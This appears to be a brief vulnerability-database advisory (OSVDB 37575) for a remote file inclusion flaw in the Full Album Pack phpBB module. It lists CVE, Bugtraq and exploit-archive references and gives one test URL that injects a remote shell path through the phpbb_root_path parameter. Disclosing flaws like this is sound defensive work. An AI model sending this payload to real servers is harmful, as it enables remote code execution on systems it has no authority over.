Full Album Pack admin/admin_album_otf.php phpbb_root_path Variable Remote File Inclusion

2007-04-19T00:00:00
ID OSVDB:37575
Type osvdb
Reporter OSVDB
Modified 2007-04-19T00:00:00

Description

Manual Testing Notes

http://[target]/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=Shell?

References:

Keyword: FAP ISS X-Force ID: 33760 Generic Exploit URL: http://www.milw0rm.com/exploits/3766 CVE-2007-2189 Bugtraq ID: 23561